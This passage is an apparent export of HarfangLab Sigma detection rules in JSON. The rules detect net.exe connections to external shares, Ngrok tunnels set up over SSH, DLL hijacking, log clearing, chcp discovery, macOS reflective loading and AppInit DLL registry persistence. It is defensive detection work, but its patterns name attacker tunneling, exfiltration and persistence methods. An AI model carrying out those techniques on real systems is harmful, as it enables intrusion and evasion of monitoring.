"rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + 
"is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.083089Z", + "creation_date": "2026-03-23T11:45:34.083091Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.083096Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/", + "https://attack.mitre.org/techniques/T1570/", + "https://attack.mitre.org/techniques/T1048/", + "https://attack.mitre.org/software/S0039/" + ], + "name": "t1570_suspicious_network_connection_net.yml", + "content": "title: Suspicious Network Connection by net.exe\nid: 1d329a59-c1ee-4f62-baac-4db01284ac5e\ndescription: |\n Detects suspicious network connections initiated by net.exe to an external IP address.\n Adversaries can mount remote network share to transfer files to and from the targeted system.\n It is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\nreferences:\n - https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1048/\n - https://attack.mitre.org/software/S0039/\ndate: 2023/09/05\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.exfiltration\n - attack.t1048\n - attack.s0039\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Exfiltration\n - 
classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessImage|endswith: '\\net.exe'\n ProcessCommandLine|re:\n - ' \\\\\\\\[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\\\' # IP\n - ' \\\\\\\\\\S+\\.([a-zA-Z]{2,63}|[xX][nN]--[a-zA-Z0-9-]{1,59})\\\\' # Domain\n - ' http(s|)://' # HTTP\n DestinationIsIpv6: 'false'\n\n filter_ip:\n DestinationIp|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - 'fe80::/10'\n - '100.64.0.0/10' # RFC6598\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d329a59-c1ee-4f62-baac-4db01284ac5e", + "rule_name": "Suspicious Network Connection by net.exe", + "rule_description": "Detects suspicious network connections initiated by net.exe to an external IP address.\nAdversaries can mount remote network share to transfer files to and from the targeted system.\nIt is recommended to look for any other malicious behavior on the target host, as well as to look for the reputation of the IP address contacted by net.exe.\n", + "rule_creation_date": "2023-09-05", + "rule_modified_date": "2025-03-07", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.exfiltration", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1048", + "attack.t1570" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612190Z", + "creation_date": "2026-03-23T11:45:34.612194Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612201Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/hakluke/status/1679023050526687244", + "https://twitter.com/malmoeb/status/1519710302820089857", + "https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel", + "https://attack.mitre.org/techniques/T1572/", + "https://attack.mitre.org/techniques/T1090/", + "https://attack.mitre.org/techniques/T1567/", + "https://attack.mitre.org/software/S0508/" + ], + "name": "t1090_linux_ngrok_ssh.yml", + "content": "title: Ngrok Tunnel via SSH (Linux)\nid: 1d38f72c-c5fe-4c2b-b710-12190bf78d90\ndescription: |\n Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to investigate this action to determine its legitimacy.\n If you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker 
accessed using this tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.Ngrok\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d38f72c-c5fe-4c2b-b710-12190bf78d90", + "rule_name": "Ngrok Tunnel via SSH (Linux)", + "rule_description": "Detects a connection to the official Ngrok Tunnel Server using the SSH command-line tool.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to investigate this action to determine its legitimacy.\nIf you believe this to be an indicator of malicious activity, it is recommended to investigate which users were compromised and what resources the attacker accessed using this tunnel.\n", + "rule_creation_date": "2023-07-13", + 
"rule_modified_date": "2025-01-09", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1090", + "attack.t1567", + "attack.t1572" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.099280Z", + "creation_date": "2026-03-23T11:45:34.099282Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.099286Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_synchost.yml", + "content": "title: DLL Hijacking via synchost.exe\nid: 1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21\ndescription: |\n Detects potential Windows DLL Hijacking via synchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim 
application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'synchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d3f9140-d12e-4ac2-ae0f-302dc6ba9c21", + "rule_name": "DLL Hijacking via synchost.exe", + "rule_description": "Detects potential Windows DLL Hijacking via synchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a 
malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627863Z", + "creation_date": "2026-03-23T11:45:34.627866Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627886Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1070/001/" + ], + "name": 
"t1070_001_clear_windows_application_log_no_process.yml", + "content": "title: Windows Application Log Cleared\nid: 1d42a517-fd7d-4aa1-bdea-8bb23464d866\ndescription: |\n Detects when one of the Windows application logs is cleared by an unknown process.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n\n # This is handled by the rule 43a740ac-2e54-4653-84a7-349b469a0a35\n filter_process:\n ProcessImage|contains: '?'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d42a517-fd7d-4aa1-bdea-8bb23464d866", + "rule_name": "Windows Application Log Cleared", + "rule_description": "Detects when one of the Windows application logs is cleared by an unknown process.\nWindows Event Logs are a record of a computer's alerts and notifications.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nIt is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\n", + "rule_creation_date": "2026-01-15", + 
"rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1070.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d5ccdaa-b937-4d62-a941-fc69637a870a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.605699Z", + "creation_date": "2026-03-23T11:45:34.605702Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.605710Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md", + "https://attack.mitre.org/techniques/T1614/001/", + "https://attack.mitre.org/techniques/T1480/" + ], + "name": "t1614_001_system_language_discovery_chcp.yml", + "content": "title: System Language Discovered via chcp\nid: 1d5ccdaa-b937-4d62-a941-fc69637a870a\ndescription: |\n Detects the identification of the system language using the chcp utility.\n Adversaries may attempt to gather information about the system language of a victim in order 
to infer the geographical location of that host.\n It is recommended to analyze the parent process to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/09cef802316c0db576963b2742b506a9f274f4ae/atomics/T1614.001/T1614.001.md\n - https://attack.mitre.org/techniques/T1614/001/\n - https://attack.mitre.org/techniques/T1480/\ndate: 2022/12/23\nmodified: 2025/10/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480\n - attack.discovery\n - attack.t1614\n - attack.t1614.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'CHCP.COM'\n CommandLine: 'chcp'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparent:\n GrandparentImage:\n - '?\\Users\\\\*\\AppData\\Local\\Ankama\\Retro\\Dofus Retro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\RingCentral\\RingCentral.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\shadow\\Shadow.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\RealtimeBoard\\\\*\\Miro.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\gitkraken\\app-*\\gitkraken.exe'\n - '?:\\Windows\\Prey\\versions\\\\*\\bin\\node.exe'\n - '*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Blitz\\Blitz.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Sky\\Sky Go\\Sky Go.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\monsisra\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - 
'\\UCMDB\\DataFlowProbe\\bin\\jre\\bin\\discovery_probe.exe|'\n - '?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe'\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Connect\\openmail.exe'\n\n exclusion_commandline:\n - ParentCommandLine:\n - '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n - '?:\\Windows\\System32\\cmd.exe /D /C chcp'\n - 'cmd.exe /x/d/c chcp'\n - 'cmd.exe /d /s /c chcp'\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /d /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\ProgramData\\\\*\\\\*.bat'\n - '?:\\windows\\system32\\cmd.exe /d /c ?:\\windows\\TEMP\\\\*\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /c *\\Bruker\\TopSpin*\\\\*'\n\n exclusion_parsys:\n CurrentDirectory|contains: 'parsys'\n GrandparentImage|endswith: '\\station.exe'\n\n exclusion_smadmin:\n ParentCommandLine|contains: '\\SMadmin\\'\n\n exclusion_anaconda:\n - GrandparentCommandLine|contains: '\\anaconda'\n - Ancestors|contains:\n - '\\anaconda3\\Scripts\\conda.exe|'\n - '\\Anaconda\\Scripts\\conda.exe|'\n - '\\miniconda\\Scripts\\conda.exe|'\n - '\\miniconda3\\Scripts\\conda.exe|'\n\n exclusion_vray:\n CurrentDirectory|contains: '\\V-Ray\\'\n\n exclusion_googlecloud:\n CurrentDirectory|contains: '\\Google\\Cloud SDK\\'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\Autodesk Installer.exe'\n\n exclusion_varian:\n GrandparentCommandLine|contains:\n - '?:\\Program Files\\Varian\\'\n - '?:\\Program Files (x86)\\Varian\\'\n\n exclusion_unity:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\'\n - '?:\\Program Files (x86)\\Unity\\Hub\\Editor\\'\n\n exclusion_postgres:\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\Program Files\\PostgreSQL\\\\??\\scripts\\runpsql.bat'\n\n exclusion_discord:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /d /s /c chcp'\n GrandparentCommandLine:\n - '*\\Discord\\app-*\\Discord.exe'\n # Discord.exe --overlay-host\n - 
'*\\Discord\\app-*\\Discord.exe *'\n\n exclusion_node:\n - ProcessGrandparentOriginalFileName: 'node.exe'\n - Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d5ccdaa-b937-4d62-a941-fc69637a870a", + "rule_name": "System Language Discovered via chcp", + "rule_description": "Detects the identification of the system language using the chcp utility.\nAdversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.\nIt is recommended to analyze the parent process to look for malicious content or other suspicious actions.\n", + "rule_creation_date": "2022-12-23", + "rule_modified_date": "2025-10-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1480", + "attack.t1614", + "attack.t1614.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.598091Z", + "creation_date": "2026-03-23T11:45:34.598097Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.598110Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f", + "https://attack.mitre.org/techniques/T1620/" + ], + "name": "t1620_reflective_loading_file.yml", + "content": "title: Suspicious Executable Reflective Loading File Created\nid: 1d9e6035-5064-4ba3-8bf6-1759b2641f54\ndescription: |\n Detects the creation of a specific file related to reflective binary execution on macOS.\n Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\n It is recommended to check for malicious activities by the process creating the file.\nreferences:\n - https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/04/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.MemoryExecution\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Path|contains: '/NSCreateObjectFileImageFromMemory-'\n Kind: 'create'\n ProcessImage|contains: '?'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n - 
'/private/var/folders/??/*/?/AppTranslocation/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d9e6035-5064-4ba3-8bf6-1759b2641f54", + "rule_name": "Suspicious Executable Reflective Loading File Created", + "rule_description": "Detects the creation of a specific file related to reflective binary execution on macOS.\nAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads.\nIt is recommended to check for malicious activities by the process creating the file.\n", + "rule_creation_date": "2024-04-03", + "rule_modified_date": "2025-10-29", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1620" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1dff2e4d-9edd-4b48-af83-6c559ea3e9c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.075932Z", + "creation_date": "2026-03-23T11:45:34.075934Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:34.075938Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/", + "https://attack.mitre.org/techniques/T1546/010/" + ], + "name": "t1546_010_persistence_registry_appinit_dlls.yml", + "content": "title: Registry AppInit DLLs Modified\nid: 1dff2e4d-9edd-4b48-af83-6c559ea3e9c5\ndescription: |\n Detects the modification of the AppInit_DLLs or LoadAppInit_DLLs keys in registry.\n Attackers may establish persistence by loading malicious libraries (DLL) via AppInit DLLs.\n This functionality allows custom libraries (DLL) to be loaded into the address space of every process that loads user32.dll.\n It is recommended to analyze the process responsible for the registry and the library pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2020/01/07/persistence-appinit-dlls/\n - https://attack.mitre.org/techniques/T1546/010/\ndate: 2020/09/24\nmodified: 2025/05/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry:\n EventType: SetValue\n\n selection_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n filter_loadappinit:\n # For LoadAppInit_DLLs all values != zero are valid\n Details: 'DWORD (0x00000000)'\n\n selection_key_appinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs'\n\n 
selection_key_requiresignedappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\RequireSignedAppInit_DLLs'\n Details: 'DWORD (0x00000000)'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n - '\\n'\n\n exclusion_nvidia_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_nvidia_loadappInit:\n TargetObject|endswith: '\\LoadAppInit_DLLs'\n Image:\n - '?:\\Windows\\System32\\nvvsvc.exe'\n - '?:\\Program Files\\NVIDIA Corporation\\Display.NvContainer\\NVDisplay.Container.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NVIDIA Corporation'\n\n exclusion_sophos_appinit:\n TargetObject|endswith: '\\AppInit_DLLs'\n Details:\n - '?:\\Windows\\SysWOW64\\SophosAV\\SOPHOS~?.DLL'\n - '?:\\WINDOWS\\system32\\SophosAV\\SOPHOS~?.DLL'\n - 